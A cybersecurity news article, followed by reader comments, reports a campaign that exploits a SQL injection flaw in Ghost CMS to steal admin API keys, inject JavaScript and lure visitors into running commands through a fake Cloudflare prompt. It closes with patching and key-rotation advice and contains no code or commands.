A large-scale campaign is using a critical SQL injection flaw in Ghost CMS (CVE-2026-26980) to steal admin API keys, then inject malicious JavaScript that leads visitors to a ClickFix-style fake Cloudflare prompt and a Windows command designed to drop payloads
For the third time in two separate incident waves, defenders went looking for one kind of malicious script—and found a different one in its place.
XLab threat intelligence researchers. working at Chinese cybersecurity company Qianxin. say they tracked a large-scale campaign exploiting a critical SQL injection vulnerability in Ghost CMS to inject malicious JavaScript across compromised websites. The campaign triggered ClickFix attack flows. and the researchers confirmed impact on more than 700 domains. including university portals. AI/SaaS companies. media outlets. fintech firms. security sites. and personal blogs.
The institutions and brands called out in the investigation include Harvard University. Oxford University. Auburn University. and DuckDuckGo—names that underline how broad the reach has been. The attack focus wasn’t random either. It centered on Ghost CMS installations that weren’t running the security fix released shortly after the vulnerability details became actionable.
CVE-2026-26980 affects Ghost CMS versions 3.24.0 through 6.19.0. The vulnerability allows unauthenticated attackers to read arbitrary data from the website database, including the admin API keys. Those keys aren’t just credentials in name: they provide management access to users. articles. and themes. and they can be used to modify article pages.
After stealing the admin API keys, the attackers moved from data theft to direct, user-facing compromise. XLab describes an attack chain in which the stolen access is used to inject malicious JavaScript into articles. The first-stage JavaScript acts as a lightweight loader. It fetches second-stage code from the attacker’s infrastructure and runs what XLab characterizes as a cloaking script—one that fingerprints visitors to decide whether they qualify as targets.
Those who pass the verification are served a fake Cloudflare prompt that appears via an iframe placed on top of the article page. Inside that prompt sits the ClickFix lure. The page tells victims to prove they’re human by pasting a provided command into their Windows command prompt. a step the attacker uses to drop a payload on the systems.
XLab says multiple payloads were used in these attacks, including DLL loaders, JavaScript droppers, and an Electron-based malware sample named UtilifySetup.exe.
The campaign also shows how hard it can be to “clean and move on.” XLab observed at least two distinct activity clusters targeting vulnerable Ghost sites. In some cases, domains were re-infected with different scripts even after cleanup. In other cases, one actor appeared to remove another actor’s injected script—only to inject their own afterward.
The fix existed, but timing still left gaps. According to the researchers, the security update for CVE-2026-26980 was released on February 19 in Ghost CMS version 6.19.1. Even so, many sites failed to install it.
SentinelOne, publishing on February 27, detailed how CVE-2026-26980 was being exploited in attacks and how incidents can be detected. XLab’s observations complement that reporting by tracing the chain from stolen admin API keys to injected JavaScript. cloaking-based targeting. and the ClickFix lure that funnels victims into executing Windows commands.
The practical takeaway for Ghost CMS administrators is blunt. Upgrade to version 6.19.1 or later, then rotate all keys used previously, because those keys may already be exposed. XLab also provided indicators of compromise. including injected scripts. and the researchers say websites need a thorough review to locate and remove malicious code.
There’s also a paper trail to protect now, and to leverage later. XLab recommends website owners keep a 30-day record of admin API call logs to support a reliable retrospective investigation—especially important when attackers may have used stolen access to change content and deliver payloads long before anyone noticed the intrusion.
Ghost CMS CVE-2026-26980 ClickFix SQL injection admin API keys JavaScript injection Qianxin XLab SentinelOne UtilifySetup.exe cybersecurity
Ghost CMS again? smh guess nothing is safe.
So they stole admin API keys and then tricked people with a fake Cloudflare prompt?? That sounds like phishing but through websites… I don’t even know what ClickFix is.
Wait, is this why my uni site keeps acting weird? Like I swear the HTML changed and then it wants you to ‘verify’ or whatever. Also Ghost is a blogging thing right? They really got into Harvard/Oxford portals from some CMS plugin flaw? Makes no sense.
I read half of it and it’s basically: SQL bug in Ghost -> steals keys -> adds JavaScript -> fake Cloudflare prompt -> Windows command to drop payloads. So if a website isn’t updated, it’s just letting hackers in… cool cool. Also why is DuckDuckGo on the list, I thought they were security obsessed. Feels like one of those ‘third time in two waves’ things where nobody learns until it hits everyone.